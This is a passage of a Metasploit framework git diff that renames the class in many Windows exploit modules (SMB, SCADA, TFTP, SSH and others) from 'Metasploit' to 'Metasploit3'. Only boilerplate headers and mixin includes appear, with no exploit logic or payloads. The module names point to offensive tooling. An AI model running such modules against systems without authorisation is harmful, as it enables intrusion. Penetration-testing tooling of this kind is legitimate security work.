+5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb index 16e0eda2c8..9dc542a090 100644 --- a/modules/exploits/windows/scada/winlog_runtime.rb +++ b/modules/exploits/windows/scada/winlog_runtime.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime_2.rb b/modules/exploits/windows/scada/winlog_runtime_2.rb index 59820d5a62..f77cd30561 100644 --- a/modules/exploits/windows/scada/winlog_runtime_2.rb +++ b/modules/exploits/windows/scada/winlog_runtime_2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb index 1fc5626c3a..50988b7a1e 100644 --- a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb index e7be802d39..18c48e6ff9 100644 --- a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb index 24901fe281..5cef7ab51a 100644 --- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb +++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb index b18b859cf0..4766596f52 100644 --- a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 46b746a108..12e2bf20af 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index 31939b2fd7..c26d264abb 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index 0295a55654..ae66736206 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb index bf086ff964..760bcfd6d2 100644 --- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb +++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/group_policy_startup.rb b/modules/exploits/windows/smb/group_policy_startup.rb index 3363ca58d4..8157d00f14 100644 --- a/modules/exploits/windows/smb/group_policy_startup.rb +++ b/modules/exploits/windows/smb/group_policy_startup.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb index 737e4e992e..67eaa9baf9 100644 --- a/modules/exploits/windows/smb/ipass_pipe_exec.rb +++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 805f8043a5..2b1c6f7272 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index eed99c23fa..817f32c8d2 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index 5fc2d84a83..8c9150e72f 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 6d304f6b60..63bb2284c4 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index a5e292b487..c607558b2b 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index d691106375..ad523283c1 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index eca2b8a106..73bf7bd392 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index e9b29235a8..335165a58d 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 87a5d01d4b..17b58d9077 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index 4f5a4b8282..e5104d14c2 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 33d43c64fe..059ff04131 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Requires valid/working DOMAIN + DC include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb index 8e1cfc90de..651de13296 100644 --- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index 3bbdaf9191..a1e8de1191 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index ac5c6f616c..3cf78788c9 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index 9d8e1c01b1..7afff33985 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index aedb3e2689..b1b688e620 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/windows_error' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb index 3898e01700..780604be72 100644 --- a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index e0e3801c00..b9c0a1baea 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 34314cca6e..7b7c816897 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 219d8ae1db..17727557a0 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Exploit mixins should be called first diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 7f195cc810..869aa183ff 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -19,7 +19,7 @@ under: require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Server diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index 83160cb256..ceea4829b0 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index b84bad0f50..07925d6526 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index dcd5dcf9f3..27ac045d5b 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index b2bf3b398c..3fbf61a555 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb index 28e74b25a0..bbf06483f1 100644 --- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb +++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 4b8e6c6fea..6d393979a1 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index 682f60c285..3b8450c140 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index 3bfe9f2107..d851559c2c 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 9c0134cacf..e53bb028ea 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index 0ccd1cd1c2..57e154860a 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index 32960a3708..73b305f2a4 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index 71895ffc6d..df985f1448 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index cb0ad19c57..4f9dde83ce 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index da1f26262b..9a437f9cab 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index d803098dbe..3106ce456d 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index f479980932..ea55e3c541 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 5cc6d5fcee..9f54353a9c 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb index 1c0354acd1..49588e2655 100644 --- a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb +++ b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index ef3f6a36b0..c8d78b0862 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index ae5f2b1be2..410c818099 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb index c5d86742f1..0e3e0d5811 100644 --- a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb +++ b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/opentftp_error_code.rb b/modules/exploits/windows/tftp/opentftp_error_code.rb index 50c3643b9c..0949f8ff23 100644 --- a/modules/exploits/windows/tftp/opentftp_error_code.rb +++ b/modules/exploits/windows/tftp/opentftp_error_code.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 71d9bb14a4..2183c12283 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 2bd828bee9..119de0ce1a 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 04eb00dd11..75131b6e09 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb index 35d08a6431..3cbd5bf1d0 100644 --- a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb +++ b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index be80d60bdf..a02cbb277c 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 9be1e50c40..4a673fd767 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index 822dd251a8..a479580f78 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb 